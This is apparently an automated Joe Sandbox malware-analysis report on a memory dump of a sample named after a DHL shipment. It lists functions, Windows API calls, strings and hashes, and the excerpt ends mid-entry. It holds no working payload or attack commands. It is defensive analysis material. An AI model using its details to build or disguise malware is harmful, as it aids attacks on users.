stdcall, xrefs: 00228DD6, 00228DDB
cdecl, xrefs: 00228D48, 00228D4D
none, xrefs: 00228E65, 00228E6A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: c29aded0ec029317e90d0248762f1b9b69875a4da4f7011a9afb25f9d3eb02ad
Instruction ID: 8c69faab3642a8f8079418b200440ac652cf74b5fa7328c48630677387d09f64
Opcode Fuzzy Hash: c29aded0ec029317e90d0248762f1b9b69875a4da4f7011a9afb25f9d3eb02ad
Instruction Fuzzy Hash: 4B51D331A25127ABCF24DFA8D8409BEB3A5BF75324B614229F426E72C4DB30DD50C790

Function 0022372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00223774
CoUninitialize.OLE32 ref: 0022377F
CoCreateInstance.OLE32(?,00000000,00000017,0023FB78,?), ref: 002237D9
IIDFromString.OLE32(?,?), ref: 0022384C
VariantInit.OLEAUT32(?), ref: 002238E4
VariantClear.OLEAUT32(?), ref: 00223936

Strings

Invalid parameter, xrefs: 00223865
NULL Pointer assignment, xrefs: 0022381E
Failed to create object, xrefs: 002237E4, 0022389A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 3b6190108b461f6863ce077e733bc63a74365b569c12a9300d0e3696e6adc4ef
Instruction ID: 40802867a061e6f461da338cd1345ccf8314da7e94dddcc0dfcd1658f77c6dc5
Opcode Fuzzy Hash: 3b6190108b461f6863ce077e733bc63a74365b569c12a9300d0e3696e6adc4ef
Instruction Fuzzy Hash: E661E370628321AFD711DF94E888F5AB7E8EF49714F10081DF9859B291C774EE98CB92

Function 00238B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001B9BB2

Part of subcall function 001B912D: GetCursorPos.USER32(?), ref: 001B9141
Part of subcall function 001B912D: ScreenToClient.USER32(00000000,?), ref: 001B915E
Part of subcall function 001B912D: GetAsyncKeyState.USER32(00000001), ref: 001B9183
Part of subcall function 001B912D: GetAsyncKeyState.USER32(00000002), ref: 001B919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00238B6B
ImageList_EndDrag.COMCTL32 ref: 00238B71
ReleaseCapture.USER32 ref: 00238B77
SetWindowTextW.USER32(?,00000000), ref: 00238C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00238C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00238CFF

Strings

@GUI_DROPID, xrefs: 00238C51
@GUI_DRAGFILE, xrefs: 00238C9A
p#', xrefs: 00238C71

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#'
API String ID: 1924731296-3649935686
Opcode ID: b9a3b5badbd9eef329742504694b625e0eebf8680cd6cc05c9989a217d04a411
Instruction ID: 1777ffa834b1e4788b71bb7bf333c5b8f3af6d848e5b47ab3b41453d80a7aa26
Opcode Fuzzy Hash: b9a3b5badbd9eef329742504694b625e0eebf8680cd6cc05c9989a217d04a411
Instruction Fuzzy Hash: 0D51ABB5104300AFD704DF14DC5AFAA77E4FF88714F000A2DF956AB2A1CB70A964CB62

Function 00213388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002133CF

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002133F0

Strings

Error: , xrefs: 002134D1
"%s" (%d) : ==> %s:, xrefs: 00213522
^ ERROR , xrefs: 0021349E
Line %d (File "%s"):, xrefs: 00213443, 0021345C
Incorrect parameters to object property !, xrefs: 002134AB
"%s" (%d) : ==> %s:%s%s, xrefs: 00213504

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 5a6014a047e3daebed89f411ebfdcc95b71079f8caafb4d46fc1bb75d0653e17
Instruction ID: 1eb97ce3554528edba0228f60d789e79d7127c6bcf4b97488baa5b44b2031568
Opcode Fuzzy Hash: 5a6014a047e3daebed89f411ebfdcc95b71079f8caafb4d46fc1bb75d0653e17
Instruction Fuzzy Hash: 47518071910219BADF15EBE0DD46EEEB7B9AF25740F204065F40572092EB352FA8DF60

Function 0020B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0020B5FC
_wcslen.LIBCMT ref: 0020B608
_wcslen.LIBCMT ref: 0020B64D
_wcslen.LIBCMT ref: 0020B68C
_wcslen.LIBCMT ref: 0020B6C7

Strings

KEYS, xrefs: 0020B647, 0020B64C
APPEND, xrefs: 0020B6C1, 0020B6C6
EXISTS, xrefs: 0020B686, 0020B68B
REMOVE, xrefs: 0020B602, 0020B607

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 7768f8b1918f96bebc55b8731c5584e1b6ebd6336e25181991480dd1e8a5d722
Instruction ID: 5bdf850ee564676c5040657964aa65b3494cb0042e5e3cc727a8fdb3c2aaebd5
Opcode Fuzzy Hash: 7768f8b1918f96bebc55b8731c5584e1b6ebd6336e25181991480dd1e8a5d722
Instruction Fuzzy Hash: 5541C932A202279BCB315F7DC8905BEB7A9AF71754B244229E421D72C6E732CD91C790

Function 00215393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002153A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00215416
GetLastError.KERNEL32 ref: 00215420
SetErrorMode.KERNEL32(00000000,READY), ref: 002154A7

Strings

UNKNOWN, xrefs: 00215444
READONLY, xrefs: 00215452
READY, xrefs: 00215460, 00215468
INVALID, xrefs: 00215459
NOTREADY, xrefs: 0021544B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 31acdb3faab49a794bc0a40dad1d7f44c90069c7fecab730ab54430194b6c071
Instruction ID: 6da53141db36360d3be59f556ba8be136c18b240a549ab878b866251f9ed184d
Opcode Fuzzy Hash: 31acdb3faab49a794bc0a40dad1d7f44c90069c7fecab730ab54430194b6c071
Instruction Fuzzy Hash: FB319D39A20615DFC710DF68D488AEABBF4EBA5305F1480A5E405DB292DB71EDD2CB90

Function 00233C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00233C79
SetMenu.USER32(?,00000000), ref: 00233C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00233D10
IsMenu.USER32(?), ref: 00233D24
CreatePopupMenu.USER32 ref: 00233D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00233D5B
DrawMenuBar.USER32 ref: 00233D63

Strings

0, xrefs: 00233C54
F, xrefs: 00233D4E

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: ed4f165be71f00adf6c6daa14c6ec8ae854bf4c69a25c9c7798f5423ffa46fa1
Instruction ID: ca266ebe776366c852959679e888d0658356ad2b01878fb0e1e2883562dec24b
Opcode Fuzzy Hash: ed4f165be71f00adf6c6daa14c6ec8ae854bf4c69a25c9c7798f5423ffa46fa1
Instruction Fuzzy Hash: 46413DB5A1120AEFDB14DF64E848A9A7BB5FF49350F140029F946A7360D770AA20CF94

Function 00233A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00233A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00233AA0
GetWindowLongW.USER32(?,000000F0), ref: 00233AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00233AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00233B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00233BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00233BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00233BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00233BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00233C13

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: a8930249fcce63369a034dc10b1ee7366f0c3174d876890b2d90fd3d3c233635
Instruction ID: c8d2d4a9447825e5b2e17adce2af685f32e44c03e8059beb437b644c644df371
Opcode Fuzzy Hash: a8930249fcce63369a034dc10b1ee7366f0c3174d876890b2d90fd3d3c233635
Instruction Fuzzy Hash: 44617BB5900248AFDB10DF68CC81EEEB7B8EF09704F10409AFA15E72A1C770AE56DB50

Function 0020B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0020B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0020A1E1,?,00000001), ref: 0020B165
GetWindowThreadProcessId.USER32(00000000), ref: 0020B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0020A1E1,?,00000001), ref: 0020B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0020B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0020A1E1,?,00000001), ref: 0020B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0020A1E1,?,00000001), ref: 0020B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0020A1E1,?,00000001), ref: 0020B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0020A1E1,?,00000001), ref: 0020B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0020A1E1,?,00000001), ref: 0020B21D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 0392dd604735adb02908ac6bf01448bbe643ed5284b75aedc91b840fef9639b5
Instruction ID: 5a54ab43ea057b8b098c767a9c23f977ee1d7745996adecb6a603782a9bfad3c
Opcode Fuzzy Hash: 0392dd604735adb02908ac6bf01448bbe643ed5284b75aedc91b840fef9639b5
Instruction Fuzzy Hash: D231CC71520305BFDB22DF24EC4DB6DBBADBB60311F204414FA08E62D1D7B49A909F60

Function 001D2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001D2C94

Part of subcall function 001D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000), ref: 001D29DE
Part of subcall function 001D29C8: GetLastError.KERNEL32(00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000,00000000), ref: 001D29F0

_free.LIBCMT ref: 001D2CA0
_free.LIBCMT ref: 001D2CAB
_free.LIBCMT ref: 001D2CB6
_free.LIBCMT ref: 001D2CC1
_free.LIBCMT ref: 001D2CCC
_free.LIBCMT ref: 001D2CD7
_free.LIBCMT ref: 001D2CE2
_free.LIBCMT ref: 001D2CED
_free.LIBCMT ref: 001D2CFB

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5954d9d00d97fec5ee8f0c01de52cafb9086a42d6b4e53e83ac9373ad0d68d25
Instruction ID: 7cd0863c511c7773438c14c6a2f819d128a68c472145d47bdf02ecc203446142
Opcode Fuzzy Hash: 5954d9d00d97fec5ee8f0c01de52cafb9086a42d6b4e53e83ac9373ad0d68d25
Instruction Fuzzy Hash: C811A476110118AFCB06EF54D892CDD3BA5FF25354F4144A6FA589F322DB31EE50AB90

Function 001A1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001A1459
OleUninitialize.OLE32(?,00000000), ref: 001A14F8
UnregisterHotKey.USER32(?), ref: 001A16DD
DestroyWindow.USER32(?), ref: 001E24B9
FreeLibrary.KERNEL32(?), ref: 001E251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 001E254B

Strings

close all, xrefs: 001A1454

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 9978f939d768bb469c958ed59c93572ed352e9b52d0c25524c829acc415d9b18
Instruction ID: ad1b4d45796442f5319162b5f0b7b9ccef185e4daa65e905f6376d746923b49a
Opcode Fuzzy Hash: 9978f939d768bb469c958ed59c93572ed352e9b52d0c25524c829acc415d9b18
Instruction Fuzzy Hash: 27D1A235701212DFCB19EF15C9A9B69F7A5BF16700F2542ADE84AAB251CB30ED22CF50

Function 00217DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00217FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00217FC1
GetFileAttributesW.KERNEL32(?), ref: 00217FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00218005
SetCurrentDirectoryW.KERNEL32(?), ref: 00218017
SetCurrentDirectoryW.KERNEL32(?), ref: 00218060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002180B0

Strings

*.*, xrefs: 00218066

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 29e7a29e50e51497b8f1617fc64a89836d9832caf5bd563e64a4dd5c0889fb01
Instruction ID: 6438cbe02050c65fcc6cc8ec7628ccb470219064e8d0aea60426d445592845fd
Opcode Fuzzy Hash: 29e7a29e50e51497b8f1617fc64a89836d9832caf5bd563e64a4dd5c0889fb01
Instruction Fuzzy Hash: 9F81A1725282469BCB20EF14C884AEAB3E8BFE9310F14485EF885D7250DB75DD958B92

Function 001A5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 001A5C7A

Part of subcall function 001A5D0A: GetClientRect.USER32(?,?), ref: 001A5D30
Part of subcall function 001A5D0A: GetWindowRect.USER32(?,?), ref: 001A5D71
Part of subcall function 001A5D0A: ScreenToClient.USER32(?,?), ref: 001A5D99

GetDC.USER32 ref: 001E46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001E4708
SelectObject.GDI32(00000000,00000000), ref: 001E4716
SelectObject.GDI32(00000000,00000000), ref: 001E472B
ReleaseDC.USER32(?,00000000), ref: 001E4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001E47C4

Strings

U, xrefs: 001E4693

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 14a0b83fce4f6539afe46b9496831795b21c527c6119f3af937cc36d3bd47fe2
Instruction ID: 940b028b617836da7b3126987491345419526dc50e437b6a7d0afb30d10cbac0
Opcode Fuzzy Hash: 14a0b83fce4f6539afe46b9496831795b21c527c6119f3af937cc36d3bd47fe2
Instruction Fuzzy Hash: 5471F234800A45DFCF25CF65C988ABE7BB6FF4A360F184269ED565A16AC3318C81DF90

Function 0021359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002135E4

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

LoadStringW.USER32(00272390,?,00000FFF,?), ref: 0021360A

Strings

"%s" (%d) : ==> %s:, xrefs: 00213742
Error: , xrefs: 002136EF
^ ERROR, xrefs: 002136C9
Line %d (File "%s"):, xrefs: 0021366B
"%s" (%d) : ==> %s:%s%s, xrefs: 00213724

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: acf275d936ad72da9af89bbf35530a7461fed972ae531db196a8d78827f08bc2
Instruction ID: 61694e2069342fa84dd2bd054897af06b9a471e62c32aafde0033ff93c363eed
Opcode Fuzzy Hash: acf275d936ad72da9af89bbf35530a7461fed972ae531db196a8d78827f08bc2
Instruction Fuzzy Hash: 31519F7181021ABADF15EBA0DC46EEEBB79EF25340F144165F105721A2EB301BE9DFA0

Function 0021C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0021C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0021C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0021C2CA
GetLastError.KERNEL32 ref: 0021C322
SetEvent.KERNEL32(?), ref: 0021C336
InternetCloseHandle.WININET(00000000), ref: 0021C341

Strings

, xrefs: 0021C2BB

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: bf290e1a8b17e8bd775b0551079ed378151461e6e28a19a0285ca0d796ad984d
Instruction ID: 73b962a638aad0ffd2dbd3af96f48be7167c2d91e47a15f2993d32199f022659
Opcode Fuzzy Hash: bf290e1a8b17e8bd775b0551079ed378151461e6e28a19a0285ca0d796ad984d
Instruction Fuzzy Hash: 3531B1B5550204AFD7219F65DC88AEB7BFCEB69740F20851EF856E2200DB30DD948B60

Function 0020989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

